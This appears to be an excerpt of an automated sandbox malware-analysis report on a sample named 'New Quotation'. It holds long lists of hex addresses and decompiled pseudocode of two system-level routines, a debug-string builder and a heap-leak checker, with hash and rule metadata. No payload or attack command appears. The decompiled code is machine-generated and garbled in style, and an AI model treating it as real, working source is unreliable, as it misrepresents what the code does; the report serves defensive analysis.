                                                                                                                                                                                          0x1d8aadf2
                                                                                                                                                                                          0x1d8aadf5
                                                                                                                                                                                          0x1d8aadf8
                                                                                                                                                                                          0x1d8aadfd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aadff
                                                                                                                                                                                          0x1d8aae04
                                                                                                                                                                                          0x1d8aae69
                                                                                                                                                                                          0x1d8aae6b
                                                                                                                                                                                          0x1d8aae6d
                                                                                                                                                                                          0x1d8aae8b
                                                                                                                                                                                          0x1d8aae8b
                                                                                                                                                                                          0x1d8aae8f
                                                                                                                                                                                          0x1d8aae97
                                                                                                                                                                                          0x1d8aae9a
                                                                                                                                                                                          0x1d8aaea9
                                                                                                                                                                                          0x1d8aaeb1
                                                                                                                                                                                          0x1d8aaeb3
                                                                                                                                                                                          0x1d8aaeb8
                                                                                                                                                                                          0x1d8aaec8
                                                                                                                                                                                          0x1d8aaec9
                                                                                                                                                                                          0x1d8aaeca
                                                                                                                                                                                          0x1d8aaed6
                                                                                                                                                                                          0x1d8aaedb
                                                                                                                                                                                          0x1d8aaede
                                                                                                                                                                                          0x1d8aaeea
                                                                                                                                                                                          0x1d8aaef9
                                                                                                                                                                                          0x1d8aaefe
                                                                                                                                                                                          0x1d8aaf01
                                                                                                                                                                                          0x1d8aaf03
                                                                                                                                                                                          0x1d8aaf03
                                                                                                                                                                                          0x1d8aaf03
                                                                                                                                                                                          0x1d8aaf0e
                                                                                                                                                                                          0x1d8aaf12
                                                                                                                                                                                          0x1d8aaf15
                                                                                                                                                                                          0x1d8aaf17
                                                                                                                                                                                          0x1d8aaf1a
                                                                                                                                                                                          0x1d8aaf1f
                                                                                                                                                                                          0x1d8aaf5b
                                                                                                                                                                                          0x1d8aaf5b
                                                                                                                                                                                          0x1d8aaf5e
                                                                                                                                                                                          0x1d8aaf5e
                                                                                                                                                                                          0x1d8aaf66
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aaf6f
                                                                                                                                                                                          0x1d8aaf75
                                                                                                                                                                                          0x1d8aaf77
                                                                                                                                                                                          0x1d8aafae
                                                                                                                                                                                          0x1d8aafae
                                                                                                                                                                                          0x1d8aafb0
                                                                                                                                                                                          0x1d8aafb3
                                                                                                                                                                                          0x1d8aafb3
                                                                                                                                                                                          0x1d8aafb6
                                                                                                                                                                                          0x1d8aafb6
                                                                                                                                                                                          0x1d8aafb9
                                                                                                                                                                                          0x1d8aafbc
                                                                                                                                                                                          0x1d8aafbf
                                                                                                                                                                                          0x1d8aafc4
                                                                                                                                                                                          0x1d8aafcc
                                                                                                                                                                                          0x1d8ab11b
                                                                                                                                                                                          0x1d8ab128
                                                                                                                                                                                          0x1d8ab12d
                                                                                                                                                                                          0x1d8ab12f
                                                                                                                                                                                          0x1d8ab132
                                                                                                                                                                                          0x1d8ab135
                                                                                                                                                                                          0x1d8ab15e
                                                                                                                                                                                          0x1d8ab160
                                                                                                                                                                                          0x1d8ab160
                                                                                                                                                                                          0x1d8ab166
                                                                                                                                                                                          0x1d8ab168
                                                                                                                                                                                          0x1d8ab16b
                                                                                                                                                                                          0x1d8ab16d
                                                                                                                                                                                          0x1d8ab16f
                                                                                                                                                                                          0x1d8ab16f
                                                                                                                                                                                          0x1d8ab173
                                                                                                                                                                                          0x1d8ab17a
                                                                                                                                                                                          0x1d8ab17c
                                                                                                                                                                                          0x1d8ab180
                                                                                                                                                                                          0x1d8ab185
                                                                                                                                                                                          0x1d8ab18b
                                                                                                                                                                                          0x1d8ab18b
                                                                                                                                                                                          0x1d8ab18d
                                                                                                                                                                                          0x1d8ab193
                                                                                                                                                                                          0x1d8ab193
                                                                                                                                                                                          0x1d8aafd4
                                                                                                                                                                                          0x1d8aafdc
                                                                                                                                                                                          0x1d8aafe3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aafe9
                                                                                                                                                                                          0x1d8aafef
                                                                                                                                                                                          0x1d8aaff1
                                                                                                                                                                                          0x1d8aaff3
                                                                                                                                                                                          0x1d8aaff3
                                                                                                                                                                                          0x1d8aafff
                                                                                                                                                                                          0x1d8ab005
                                                                                                                                                                                          0x1d8ab007
                                                                                                                                                                                          0x1d8ab009
                                                                                                                                                                                          0x1d8ab00e
                                                                                                                                                                                          0x1d8ab194
                                                                                                                                                                                          0x1d8ab194
                                                                                                                                                                                          0x1d8ab19a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8ab1a0
                                                                                                                                                                                          0x1d8ab1a3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8ab014
                                                                                                                                                                                          0x1d8ab014
                                                                                                                                                                                          0x1d8ab019
                                                                                                                                                                                          0x1d8ab02c
                                                                                                                                                                                          0x1d8ab033
                                                                                                                                                                                          0x1d8ab035
                                                                                                                                                                                          0x1d8ab035
                                                                                                                                                                                          0x1d8ab03a
                                                                                                                                                                                          0x1d8ab03c
                                                                                                                                                                                          0x1d8ab049
                                                                                                                                                                                          0x1d8ab052
                                                                                                                                                                                          0x1d8ab056
                                                                                                                                                                                          0x1d8ab058
                                                                                                                                                                                          0x1d8ab067
                                                                                                                                                                                          0x1d8ab067
                                                                                                                                                                                          0x1d8ab070
                                                                                                                                                                                          0x1d8ab07b
                                                                                                                                                                                          0x1d8ab07e
                                                                                                                                                                                          0x1d8ab0ec
                                                                                                                                                                                          0x1d8ab0ec
                                                                                                                                                                                          0x1d8ab0ec
                                                                                                                                                                                          0x1d8ab0f2
                                                                                                                                                                                          0x1d8ab0f5
                                                                                                                                                                                          0x1d8ab0fb
                                                                                                                                                                                          0x1d8ab0fe
                                                                                                                                                                                          0x1d8ab100
                                                                                                                                                                                          0x1d8ab105
                                                                                                                                                                                          0x1d8ab110
                                                                                                                                                                                          0x1d8ab116
                                                                                                                                                                                          0x1d8ab118
                                                                                                                                                                                          0x1d8ab118
                                                                                                                                                                                          0x1d8ab118
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8ab080
                                                                                                                                                                                          0x1d8ab080
                                                                                                                                                                                          0x1d8ab080
                                                                                                                                                                                          0x1d8ab080
                                                                                                                                                                                          0x1d8ab083
                                                                                                                                                                                          0x1d8ab086
                                                                                                                                                                                          0x1d8ab086
                                                                                                                                                                                          0x1d8ab089
                                                                                                                                                                                          0x1d8ab092
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8ab096
                                                                                                                                                                                          0x1d8ab09c
                                                                                                                                                                                          0x1d8ab0a7
                                                                                                                                                                                          0x1d8ab0b0
                                                                                                                                                                                          0x1d8ab0ca
                                                                                                                                                                                          0x1d8ab0cc
                                                                                                                                                                                          0x1d8ab0d2
                                                                                                                                                                                          0x1d8ab0d6
                                                                                                                                                                                          0x1d8ab0d9
                                                                                                                                                                                          0x1d8ab0d9
                                                                                                                                                                                          0x1d8ab0de
                                                                                                                                                                                          0x1d8ab0de
                                                                                                                                                                                          0x1d8ab0e1
                                                                                                                                                                                          0x1d8ab0e2
                                                                                                                                                                                          0x1d8ab0e8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8ab05a
                                                                                                                                                                                          0x1d8ab05a
                                                                                                                                                                                          0x1d8ab05d
                                                                                                                                                                                          0x1d8ab05d
                                                                                                                                                                                          0x1d8ab05e
                                                                                                                                                                                          0x1d8ab060
                                                                                                                                                                                          0x1d8ab063
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8ab05d
                                                                                                                                                                                          0x1d8ab058
                                                                                                                                                                                          0x1d8ab01b
                                                                                                                                                                                          0x1d8ab020
                                                                                                                                                                                          0x1d8ab027
                                                                                                                                                                                          0x1d8ab02a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8ab022
                                                                                                                                                                                          0x1d8ab022
                                                                                                                                                                                          0x1d8ab022
                                                                                                                                                                                          0x1d8ab023
                                                                                                                                                                                          0x1d8ab023
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8ab022
                                                                                                                                                                                          0x1d8ab00e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aaf77
                                                                                                                                                                                          0x1d8aaf71
                                                                                                                                                                                          0x1d8aaf73
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aaf73
                                                                                                                                                                                          0x1d8aaf21
                                                                                                                                                                                          0x1d8aaf26
                                                                                                                                                                                          0x1d8aaf8c
                                                                                                                                                                                          0x1d8aaf8e
                                                                                                                                                                                          0x1d8aaf90
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aaf92
                                                                                                                                                                                          0x1d8aaf95
                                                                                                                                                                                          0x1d8aaf9a
                                                                                                                                                                                          0x1d8aaf9c
                                                                                                                                                                                          0x1d8aafa1
                                                                                                                                                                                          0x1d8aafa7
                                                                                                                                                                                          0x1d8aafa7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aafa1
                                                                                                                                                                                          0x1d8aaf4d
                                                                                                                                                                                          0x1d8aaf52
                                                                                                                                                                                          0x1d8aaf55
                                                                                                                                                                                          0x1d8aaf58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aaf79
                                                                                                                                                                                          0x1d8aaf7d
                                                                                                                                                                                          0x1d8aaf82
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aaf8a
                                                                                                                                                                                          0x1d8aaeba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aaeba
                                                                                                                                                                                          0x1d8aae6f
                                                                                                                                                                                          0x1d8aae6f
                                                                                                                                                                                          0x1d8aae79
                                                                                                                                                                                          0x1d8aae7b
                                                                                                                                                                                          0x1d8aae7b
                                                                                                                                                                                          0x1d8aae81
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aae81
                                                                                                                                                                                          0x1d8aae2b
                                                                                                                                                                                          0x1d8aae30
                                                                                                                                                                                          0x1d8aae33
                                                                                                                                                                                          0x1d8aae36
                                                                                                                                                                                          0x1d8aae39
                                                                                                                                                                                          0x1d8aae39
                                                                                                                                                                                          0x1d8aae3c
                                                                                                                                                                                          0x1d8aae3c
                                                                                                                                                                                          0x1d8aae44
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aae4d
                                                                                                                                                                                          0x1d8aae53
                                                                                                                                                                                          0x1d8aae55
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aae5b
                                                                                                                                                                                          0x1d8aae62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aae64
                                                                                                                                                                                          0x1d8aae4f
                                                                                                                                                                                          0x1d8aae51
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aae51
                                                                                                                                                                                          0x1d8aade1
                                                                                                                                                                                          0x1d8aad74
                                                                                                                                                                                          0x1d8aad77
                                                                                                                                                                                          0x1d8aadbf
                                                                                                                                                                                          0x1d8aadc5
                                                                                                                                                                                          0x1d8aadc7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aadc7
                                                                                                                                                                                          0x1d8aad79
                                                                                                                                                                                          0x1d8aad7c
                                                                                                                                                                                          0x1d8aadb6
                                                                                                                                                                                          0x1d8aadbc
                                                                                                                                                                                          0x1d8aadbe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aadbe
                                                                                                                                                                                          0x1d8aad7e
                                                                                                                                                                                          0x1d8aad81
                                                                                                                                                                                          0x1d8aadad
                                                                                                                                                                                          0x1d8aadb3
                                                                                                                                                                                          0x1d8aadb5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aadb5
                                                                                                                                                                                          0x1d8aad83
                                                                                                                                                                                          0x1d8aad86
                                                                                                                                                                                          0x1d8aada4
                                                                                                                                                                                          0x1d8aadaa
                                                                                                                                                                                          0x1d8aadac
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aadac
                                                                                                                                                                                          0x1d8aad88
                                                                                                                                                                                          0x1d8aad8b
                                                                                                                                                                                          0x1d8aad9b
                                                                                                                                                                                          0x1d8aada1
                                                                                                                                                                                          0x1d8aada3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aada3
                                                                                                                                                                                          0x1d8aad90
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aad92
                                                                                                                                                                                          0x1d8aad98
                                                                                                                                                                                          0x1d8aad9a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aad9a
                                                                                                                                                                                          0x1d8aad10
                                                                                                                                                                                          0x1d8aad12
                                                                                                                                                                                          0x1d8aad18
                                                                                                                                                                                          0x1d8aad1a
                                                                                                                                                                                          0x1d8aad54
                                                                                                                                                                                          0x1d8aad59
                                                                                                                                                                                          0x1d8aad5f
                                                                                                                                                                                          0x1d8aad63
                                                                                                                                                                                          0x1d8aad68
                                                                                                                                                                                          0x1d8aad6a
                                                                                                                                                                                          0x1d8aad6a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8aad1a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                          • Opcode ID: a38576dc108c172ec6abe4241a8184600e719529e75528aeb80bbb1bd49cfe30
                                                                                                                                                                                          • Instruction ID: 7816a99d739052c2e8c1207e840f0c8fc64439c243126d83e6de27575d036e71
                                                                                                                                                                                          • Opcode Fuzzy Hash: a38576dc108c172ec6abe4241a8184600e719529e75528aeb80bbb1bd49cfe30
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DF1F872E006259FCB08CF68C99167EFBF5EF88210B1A456EE496DB790D634EE41CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D85F9AA Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                          			E1D85F9AA(intOrPtr __ecx, signed int __edx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v140;
				char _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				char* _v680;
				signed short _v684;
				intOrPtr _v688;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				void* _t42;
				void* _t58;
				signed char* _t59;
				signed int* _t66;
				signed char* _t75;
				void* _t77;
				void* _t80;
				signed int _t81;
				void* _t82;

				_t74 = __edx;
				_v8 =  *0x1d8cb370 ^ _t81;
				_t39 = __ecx;
				_v676 = L"Type:";
				_t78 = 0;
				_v688 = __ecx;
				_t66 = __edx;
				_v672 = L" Name:";
				_t68 = 0x208;
				_v668 = L" Language:";
				_t75 = 0x7ffe0384;
				_v664 = L" Item:";
				if((_a8 & 0x0000000e) == 0) {
					L10:
					if((_a8 & 0x00000001) != 0) {
						_t74 =  &_v660;
						_t71 = _t39;
						_t42 = E1D85F85C(_t39,  &_v660, _t68, _t78, _t78, _t78, _t78);
						_t78 = _t42;
						if(_t42 >= 0) {
							E1D815050(_t71,  &_v684,  &_v660);
							if(E1D7E3C40() != 0) {
								_t75 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_t74 =  *_t75 & 0x000000ff;
							E1D85FC01( &_v684,  *_t75 & 0x000000ff);
						}
					}
					return E1D814B50(_t78, _t66, _v8 ^ _t81, _t74, _t75, _t78);
				}
				_v684 = 0x2080000;
				_v680 =  &_v660;
				_t77 = 0;
				E1D7DFE40(0x208,  &_v684, L"SR - ");
				_t80 =  &_v676 - _t66;
				do {
					E1D7DFE40(_t68,  &_v684,  *((intOrPtr*)(_t80 + _t66)));
					_t54 =  *_t66;
					if(( *_t66 & 0xffff0000) == 0 || _t77 == 3) {
						_t68 =  &_v140;
						E1D81F3C0(_t54,  &_v140, 0x40, 0xa);
						_t82 = _t82 + 0x10;
						_t54 =  &_v140;
					}
					E1D7DFE40(_t68,  &_v684, _t54);
					_t77 = _t77 + 1;
					_t66 =  &(_t66[1]);
				} while (_t77 < _a4);
				_t58 = E1D7E3C40();
				_t75 = 0x7ffe0384;
				if(_t58 == 0) {
					_t59 = 0x7ffe0384;
				} else {
					_t59 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				_t74 =  *_t59 & 0x000000ff;
				E1D85FC01( &_v684,  *_t59 & 0x000000ff);
				_t78 = 0;
				E1D818F40( &_v660, 0, _v684 & 0x0000ffff);
				_t39 = _v688;
				_t68 = 0x208;
				goto L10;
			}


























                                                                                                                                                                                          0x1d85f9aa
                                                                                                                                                                                          0x1d85f9bc
                                                                                                                                                                                          0x1d85f9c1
                                                                                                                                                                                          0x1d85f9c3
                                                                                                                                                                                          0x1d85f9cd
                                                                                                                                                                                          0x1d85f9cf
                                                                                                                                                                                          0x1d85f9d9
                                                                                                                                                                                          0x1d85f9dc
                                                                                                                                                                                          0x1d85f9e6
                                                                                                                                                                                          0x1d85f9eb
                                                                                                                                                                                          0x1d85f9f5
                                                                                                                                                                                          0x1d85f9fa
                                                                                                                                                                                          0x1d85fa04
                                                                                                                                                                                          0x1d85fadb
                                                                                                                                                                                          0x1d85fadf
                                                                                                                                                                                          0x1d85fae6
                                                                                                                                                                                          0x1d85faec
                                                                                                                                                                                          0x1d85faee
                                                                                                                                                                                          0x1d85faf3
                                                                                                                                                                                          0x1d85faf7
                                                                                                                                                                                          0x1d85fb07
                                                                                                                                                                                          0x1d85fb13
                                                                                                                                                                                          0x1d85fb1e
                                                                                                                                                                                          0x1d85fb1e
                                                                                                                                                                                          0x1d85fb24
                                                                                                                                                                                          0x1d85fb2d
                                                                                                                                                                                          0x1d85fb2d
                                                                                                                                                                                          0x1d85faf7
                                                                                                                                                                                          0x1d85fb42
                                                                                                                                                                                          0x1d85fb42
                                                                                                                                                                                          0x1d85fa10
                                                                                                                                                                                          0x1d85fa1a
                                                                                                                                                                                          0x1d85fa20
                                                                                                                                                                                          0x1d85fa2e
                                                                                                                                                                                          0x1d85fa39
                                                                                                                                                                                          0x1d85fa3b
                                                                                                                                                                                          0x1d85fa45
                                                                                                                                                                                          0x1d85fa4a
                                                                                                                                                                                          0x1d85fa51
                                                                                                                                                                                          0x1d85fa5c
                                                                                                                                                                                          0x1d85fa64
                                                                                                                                                                                          0x1d85fa69
                                                                                                                                                                                          0x1d85fa6c
                                                                                                                                                                                          0x1d85fa6c
                                                                                                                                                                                          0x1d85fa7a
                                                                                                                                                                                          0x1d85fa7f
                                                                                                                                                                                          0x1d85fa80
                                                                                                                                                                                          0x1d85fa83
                                                                                                                                                                                          0x1d85fa88
                                                                                                                                                                                          0x1d85fa8d
                                                                                                                                                                                          0x1d85fa94
                                                                                                                                                                                          0x1d85faa6
                                                                                                                                                                                          0x1d85fa96
                                                                                                                                                                                          0x1d85fa9f
                                                                                                                                                                                          0x1d85fa9f
                                                                                                                                                                                          0x1d85faa8
                                                                                                                                                                                          0x1d85fab1
                                                                                                                                                                                          0x1d85fabd
                                                                                                                                                                                          0x1d85fac8
                                                                                                                                                                                          0x1d85facd
                                                                                                                                                                                          0x1d85fad6
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                                                                                                                                                          • API String ID: 0-3082644519
                                                                                                                                                                                          • Opcode ID: d3b1f157fc2a91c11b1c99c4d88d2ce9faf1d218f1e4fa56c0501a898b74605b
                                                                                                                                                                                          • Instruction ID: 38a5037b310e5bfbd03094e30b1d61379fc570dc961a76c2d387b862db857e86
                                                                                                                                                                                          • Opcode Fuzzy Hash: d3b1f157fc2a91c11b1c99c4d88d2ce9faf1d218f1e4fa56c0501a898b74605b
                                                                                                                                                                                          • Instruction Fuzzy Hash: F4419272A01228AFCF20CB68CC48BDBB7BDAF45354F4541D9A549A7290DE34AE84CF53
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FD8F0 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                          			E1D7FD8F0() {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t55;
				char* _t56;
				void* _t58;
				signed int _t68;
				void* _t70;
				signed int _t71;

				_t25 =  *[fs:0x30];
				if(( *(_t25 + 0x68) & 0x00000100) != 0) {
					L4:
					return _t25;
				}
				_t25 =  *[fs:0x30];
				if(( *(_t25 + 0x68) & 0x02000000) != 0 ||  *0x1d8c4898 == 0 && ( *0x1d8c6944 & 0x00000003) == 0) {
					goto L4;
				} else {
					 *0x1d8c6d5c = 0;
					_t25 = E1D7E0F90(_t55, 0, _t70, __eflags, 3, 0, 0, 0, 0, 0);
					 *0x1d8c47d8 = _t25;
					__eflags = _t25;
					if(_t25 == 0) {
						goto L4;
					}
					_t71 =  *[fs:0x30];
					_t56 = "HEAP: ";
					_t26 =  *[fs:0x30];
					__eflags =  *(_t26 + 0xc);
					if( *(_t26 + 0xc) == 0) {
						_push(_t56);
						E1D7CB910();
					} else {
						E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("Inspecting leaks at process shutdown ...\n");
					E1D7CB910();
					_pop(_t58);
					_t29 = E1D87E993(_t58, _t68);
					__eflags = _t29;
					if(_t29 != 0) {
						 *0x1d8c6d58 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 0x90)) +  *(_t71 + 0x88) * 4 - 4));
						E1D87EC84();
						E1D87EE54(_t56, 0, _t71, __eflags);
						E1D7CF8B0(_t68,  *0x1d8c47d8);
						_t35 =  *[fs:0x30];
						 *0x1d8c47d8 = 0;
						__eflags =  *0x1d8c6d5c; // 0x0
						if(__eflags == 0) {
							__eflags =  *(_t35 + 0xc);
							if( *(_t35 + 0xc) == 0) {
								_push(_t56);
								E1D7CB910();
							} else {
								E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("No leaks detected.\n");
							return E1D7CB910();
						}
						__eflags =  *(_t35 + 0xc);
						if( *(_t35 + 0xc) == 0) {
							_push(_t56);
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_t25 = E1D7CB910("%ld leaks detected.\n",  *0x1d8c6d5c);
						__eflags =  *0x1d8c6944 & 0x00000002;
						if(( *0x1d8c6944 & 0x00000002) == 0) {
							goto L4;
						} else {
							asm("int3");
							return _t25;
						}
					} else {
						return E1D7CF8B0(_t68,  *0x1d8c47d8);
					}
				}
			}
















                                                                                                                                                                                          0x1d7fd8f0
                                                                                                                                                                                          0x1d7fd900
                                                                                                                                                                                          0x1d7fd92e
                                                                                                                                                                                          0x1d7fd92e
                                                                                                                                                                                          0x1d7fd92e
                                                                                                                                                                                          0x1d7fd902
                                                                                                                                                                                          0x1d7fd90f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f16f
                                                                                                                                                                                          0x1d83f178
                                                                                                                                                                                          0x1d83f17e
                                                                                                                                                                                          0x1d83f183
                                                                                                                                                                                          0x1d83f188
                                                                                                                                                                                          0x1d83f18a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f190
                                                                                                                                                                                          0x1d83f197
                                                                                                                                                                                          0x1d83f19c
                                                                                                                                                                                          0x1d83f1a2
                                                                                                                                                                                          0x1d83f1a5
                                                                                                                                                                                          0x1d83f1c4
                                                                                                                                                                                          0x1d83f1c5
                                                                                                                                                                                          0x1d83f1a7
                                                                                                                                                                                          0x1d83f1bc
                                                                                                                                                                                          0x1d83f1c1
                                                                                                                                                                                          0x1d83f1cb
                                                                                                                                                                                          0x1d83f1d0
                                                                                                                                                                                          0x1d83f1d5
                                                                                                                                                                                          0x1d83f1d6
                                                                                                                                                                                          0x1d83f1db
                                                                                                                                                                                          0x1d83f1dd
                                                                                                                                                                                          0x1d83f1ff
                                                                                                                                                                                          0x1d83f204
                                                                                                                                                                                          0x1d83f209
                                                                                                                                                                                          0x1d83f214
                                                                                                                                                                                          0x1d83f219
                                                                                                                                                                                          0x1d83f21f
                                                                                                                                                                                          0x1d83f225
                                                                                                                                                                                          0x1d83f22b
                                                                                                                                                                                          0x1d83f27b
                                                                                                                                                                                          0x1d83f27e
                                                                                                                                                                                          0x1d83f29d
                                                                                                                                                                                          0x1d83f29e
                                                                                                                                                                                          0x1d83f280
                                                                                                                                                                                          0x1d83f295
                                                                                                                                                                                          0x1d83f29a
                                                                                                                                                                                          0x1d83f2a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f2ae
                                                                                                                                                                                          0x1d83f22d
                                                                                                                                                                                          0x1d83f230
                                                                                                                                                                                          0x1d83f24f
                                                                                                                                                                                          0x1d83f250
                                                                                                                                                                                          0x1d83f232
                                                                                                                                                                                          0x1d83f247
                                                                                                                                                                                          0x1d83f24c
                                                                                                                                                                                          0x1d83f261
                                                                                                                                                                                          0x1d83f266
                                                                                                                                                                                          0x1d83f26f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f275
                                                                                                                                                                                          0x1d83f275
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f275
                                                                                                                                                                                          0x1d83f1df
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83f1e5
                                                                                                                                                                                          0x1d83f1dd

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
                                                                                                                                                                                          • API String ID: 0-1155200129
                                                                                                                                                                                          • Opcode ID: 003916f2e7d173ad910f546b117126cd5e28c1497b6ff79d09a777f641add663
                                                                                                                                                                                          • Instruction ID: 411b44f9ba963bf987085f732616e7913eda1407454152ecf260af79256f2d15
                                                                                                                                                                                          • Opcode Fuzzy Hash: 003916f2e7d173ad910f546b117126cd5e28c1497b6ff79d09a777f641add663
                                                                                                                                                                                          • Instruction Fuzzy Hash: BC31037A115646DFC312DB58E888F3573F8EB84B75F02441AF9484B672DA35F880EA43
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                          			E1D7FEE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
